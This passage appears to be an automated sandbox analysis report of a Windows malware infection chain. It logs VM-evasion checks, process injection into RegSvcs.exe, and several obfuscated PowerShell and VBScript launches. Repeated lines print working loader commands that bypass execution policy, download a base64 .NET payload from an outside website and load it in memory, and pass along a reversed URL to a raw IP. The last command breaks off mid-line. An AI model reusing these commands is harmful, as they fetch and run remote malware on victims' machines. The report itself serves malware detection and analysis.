                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599797
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599641
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599417
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599266
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599092
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598891
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598738
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598603
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598453
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                Source: wscript.exe, 0000001B.00000002.2346659137.000001C71FEBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: powershell.exe, 00000004.00000002.2487072351.00000155DC173000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.3715892947.000001C054380000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: powershell.exe, 00000021.00000002.2793866781.000001C03C89F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmtoolsd
                Source: wscript.exe, 0000001E.00000002.2362115387.000002B93E584000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\------
                Source: powershell.exe, 00000013.00000002.3279664039.00000240D8850000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: amsi64_6644.amsi.csv, type: OTHER
                Source: Yara matchFile source: amsi64_7896.amsi.csv, type: OTHER
                Source: Yara matchFile source: amsi64_7728.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1120, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7896, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
                Source: 4.2.powershell.exe.155c41c4868.3.raw.unpack, MXuuJb.csReference to suspicious API methods: ReadProcessMemory_API(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesWritten)
                Source: 4.2.powershell.exe.155c41c4868.3.raw.unpack, MXuuJb.csReference to suspicious API methods: VirtualAllocEx_API(processInformation.ProcessHandle, num4, length, 12288, 64)
                Source: 4.2.powershell.exe.155c41c4868.3.raw.unpack, MXuuJb.csReference to suspicious API methods: WriteProcessMemory_API(processInformation.ProcessHandle, num5, data, bufferSize, ref bytesWritten)
                Source: 4.2.powershell.exe.155c41c7c80.2.raw.unpack, AntiProcess.csReference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
                Source: 4.2.powershell.exe.155c41c7c80.2.raw.unpack, Win32.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
                Source: 4.2.powershell.exe.155c41c7c80.2.raw.unpack, Win32.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40E000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 410000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 906008Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40E000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 410000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1059008
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40E000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 410000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: BA7008
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\user\AppData\Local\Temp\xx1.ps1
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $exeny = 'j bz he yqbh go i 9 c jw w de mw n ds j b3 gk a bs hy i 9 c jw l h egbb gm twbn ek bgbn hi jq n ds wwbc hk d bl fs xqbd c j bu g4 dqbv ge i 9 c wwbz hk cwb0 gu bq u em bwbu hy zqby hq xq 6 do rgby g8 bqbc ge cwbl dy n bt hq cgbp g4 zw o c k bo gu dw t e8 ygbq gu ywb0 c tgbl hq lgbx gu ygbd gw aqbl g4 d p c4 r bv hc bgbs g8 yqbk fm d by gk bgbn cg jwbo hq d bw hm og v c8 dwb3 hc lgbp g4 zgbv hi bqbh gm aqbv g4 bwbw g8 cgb0 hu bgbh c4 ywbv g0 lwb3 h lqbj g8 bgb0 gu bgb0 c8 dqbw gw bwbh gq cw v di m y dq lw w dk lwbk gw b bz gs eqbm ge b u hq e b0 cc kq p ds wwbz hk cwb0 gu bq u ee c bw eq bwbt ge aqbu f0 og 6 em dqby hi zqbu hq r bv g0 yqbp g4 lgbm g8 yqbk cg j bu g4 dqbv ge kq u ec zqb0 fq eqbw gu k n em b bh hm cwbm gk ygby ge cgb5 de lgbd gw yqbz hm mq n ck lgbh gu d bn gu d bo g8 z o cc wgb4 es s bh cc kq u ek bgb2 g8 awbl cg j bu hu b bs cw i bb g8 ygbq gu ywb0 fs xqbd c k n hq e b0 c4 mqbt eq lwbt fy tgbf c8 egby ge tq v gc zqbs c8 awbh fq lw 5 dy mq u dm mw y c4 mg w di lg x dk lw v do c b0 hq a n c l g cq dwbp gg b b2 c l g cc xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf c0 lq t c0 lq t c0 lq t c0 lq t c0 jw s c j bz he yqbh go l g cc mq n cw i n fi bwbk ge jw g ck kq 7 ==';$kbyhl = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $exeny.replace(' ','a') ) );$kbyhl = $kbyhl.replace('%pzacoginmr%', 'c:\users\user\desktop\sostener.vbs');powershell $kbyhl;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'c:\users\user\desktop\sostener.vbs';[byte[]] $nnuoa = [system.convert]::frombase64string( (new-object net.webclient).downloadstring('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.appdomain]::currentdomain.load($nnuoa).gettype('classlibrary1.class1').getmethod('zxkhg').invoke($null, [object[]] ('txt.1sd/svne/zram/ger/kat/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'roda' ));"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $exeny = 'j bz he yqbh go i 9 c jw w de mw n ds j b3 gk a bs hy i 9 c jw l h egbb gm twbn ek bgbn hi jq n ds wwbc hk d bl fs xqbd c j bu g4 dqbv ge i 9 c wwbz hk cwb0 gu bq u em bwbu hy zqby hq xq 6 do rgby g8 bqbc ge cwbl dy n bt hq cgbp g4 zw o c k bo gu dw t e8 ygbq gu ywb0 c tgbl hq lgbx gu ygbd gw aqbl g4 d p c4 r bv hc bgbs g8 yqbk fm d by gk bgbn cg jwbo hq d bw hm og v c8 dwb3 hc lgbp g4 zgbv hi bqbh gm aqbv g4 bwbw g8 cgb0 hu bgbh c4 ywbv g0 lwb3 h lqbj g8 bgb0 gu bgb0 c8 dqbw gw bwbh gq cw v di m y dq lw w dk lwbk gw b bz gs eqbm ge b u hq e b0 cc kq p ds wwbz hk cwb0 gu bq u ee c bw eq bwbt ge aqbu f0 og 6 em dqby hi zqbu hq r bv g0 yqbp g4 lgbm g8 yqbk cg j bu g4 dqbv ge kq u ec zqb0 fq eqbw gu k n em b bh hm cwbm gk ygby ge cgb5 de lgbd gw yqbz hm mq n ck lgbh gu d bn gu d bo g8 z o cc wgb4 es s bh cc kq u ek bgb2 g8 awbl cg j bu hu b bs cw i bb g8 ygbq gu ywb0 fs xqbd c k n hq e b0 c4 mqbt eq lwbt fy tgbf c8 egby ge tq v gc zqbs c8 awbh fq lw 5 dy mq u dm mw y c4 mg w di lg x dk lw v do c b0 hq a n c l g cq dwbp gg b b2 c l g cc xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf f8 xwbf c0 lq t c0 lq t c0 lq t c0 lq t c0 jw s c j bz he yqbh go l g cc mq n cw i n fi bwbk ge jw g ck kq 7 ==';$kbyhl = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $exeny.replace(' ','a') ) );$kbyhl = $kbyhl.replace('%pzacoginmr%', 'c:\users\user\appdata\local\temp\sostener.vbs');powershell $kbyhl;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'c:\users\user\appdata\local\temp\sostener.vbs';[byte[]] $nnuoa = [system.convert]::frombase64string( (new-object net.webclient).downloadstring('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.appdomain]::currentdomain.load($nnuoa).gettype('classlibrary1.class1').getmethod('zxkhg').invoke($null, [object[]] ('txt.1sd/svne/zram/ger/kat/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'roda' ));"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $exeny = 'j bz he yqbh go i 9 c jw w de mw n ds j b3 gk a bs hy i 9 c jw l h egbb gm twbn ek bgbn hi jq n ds wwbc hk d bl fs xqbd c j bu g4 dqbv ge i 9 c wwbz hk cwb0 gu bq u em bwbu hy zqby hq xq 6 do rgby g8 bqbc ge cwbl dy n bt hq cgbp g4 zw o c k bo gu dw t e8 ygbq gu ywb0 c tgbl hq lgbx gu ygbd gw aqbl g4 d p c4 r bv hc bgbs g8 yqbk fm d by gk bgbn cg jwbo hq d bw hm og v c8 dwb3 hc lgbp g4 zgbv hi bqbh gm aqbv g4 bwbw g8 cgb0 hu bgbh c4 ywbv g0 lwb3 h lqbj g8 bgb0 gu bgb0 c8 dqbw gw bwbh gq cw v di m y dq lw w dk lwbk gw b bz gs eqbm ge b u hq e b0 cc kq p ds wwbz hk cwb0 gu bq u ee c bw eq bwbt ge aqbu f0 og 6 em dqby hi zqbu hq r bv g0 yqbp g4 lgbm g8 yqbk cg j bu g4 